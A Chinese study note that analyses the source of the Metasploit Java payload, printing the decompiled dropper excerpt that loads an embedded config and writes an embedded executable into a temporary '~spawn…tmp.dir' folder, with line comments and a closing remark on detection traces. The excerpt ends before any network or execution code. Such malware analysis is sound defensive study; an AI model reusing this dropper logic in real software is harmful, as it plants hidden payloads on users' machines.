【学习笔记】msf-java木马源码分析

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.PrintStream;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.net.URLConnection;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.util.Enumeration;
import java.util.Locale;
import java.util.Properties;
import java.util.Stack;
import java.util.StringTokenizer;
public class Payload extends ClassLoader {
// Host-environment constants, read once from JVM system properties when the class is initialised.
// Lower-cased "os.name"; Locale.ENGLISH keeps the case mapping independent of the host's default locale.
private static final String OS_NAME = System.getProperty("os.name").toLowerCase(Locale.ENGLISH);
// "path.separator" is the character that separates entries in a path list (";" or ":"),
// not the file-name separator.
private static final String PATH_SEP = System.getProperty("path.separator");
// True only when the lower-cased OS name is exactly "aix".
private static final boolean IS_AIX = "aix".equals(OS_NAME);
// True when the path-list separator is ";" -- going by the name, used as the test for a DOS/Windows-style host.
// NOTE(review): the code that reads IS_AIX, IS_DOS and JAVA_HOME is outside this excerpt; confirm how each is used.
private static final boolean IS_DOS = PATH_SEP.equals(";");
// "java.home": installation directory of the Java runtime that is executing this class.
private static final String JAVA_HOME = System.getProperty("java.home");
public static void main(String[] paramArrayOfString) throws Exception {
Properties properties = new Properties();
//读取properties类,创建配置文件
Class clazz = Payload.class;
//通过反射类获取payload 文件路径
String str1 = clazz.getName().replace('.', '/') + ".class";
InputStream inputStream = clazz.getResourceAsStream("/metasploit.dat");
if (inputStream != null) {
  properties.load(inputStream);
  inputStream.close();
} 
String str2 = properties.getProperty("Executable");
//搜索获取可执行文件-->str2获取Executable的值

if (str2 != null) {
  File file1 = File.createTempFile("~spawn", ".tmp");
  file1.delete();
  File file2 = new File(file1.getAbsolutePath() + ".dir");
  //如果字段不为空,则获取路径并创建文件-->~spawn.tmp.dir
  file2.mkdir();
  File file3 = new File(file2, str2);
  //这里只是构造路径对象(新建目录下、以Executable的值为文件名),此时磁盘上还没有这个文件
  writeEmbeddedFile(clazz, str2, file3);
  //调用writeEmbeddedFile向file3写入内容;该方法的实现不在本段中,从名字看是把类路径中内嵌的同名资源写出到新建目录下(并非创建名为Executable的目录)
  properties.remove("Executable");
  //删除配置文件中的Executable
  properties.put("DroppedExecutable", file3.getCanonicalPath());
  //DroppedExecutable写入值,值为新创建的文件的路径
} 
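小结:以上代码通过 Payload.class 读取内嵌的配置资源 /metasploit.dat;如果其中有 Executable 项,就在系统临时目录下新建一个以 ~spawn 开头、以 .tmp.dir 结尾的目录,把对应的内嵌文件写到该目录中,然后从配置里删除 Executable,并把落地文件的规范路径记入 DroppedExecutable。从检测角度看,临时目录下出现这种命名的目录,以及由 Java 进程写出的可执行文件,都是值得关注的落地痕迹。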

int i = Integer.parseInt(properties.getProperty("Spawn", "0"));
//i获取配置项Spawn的整数值,未配置时默认为0
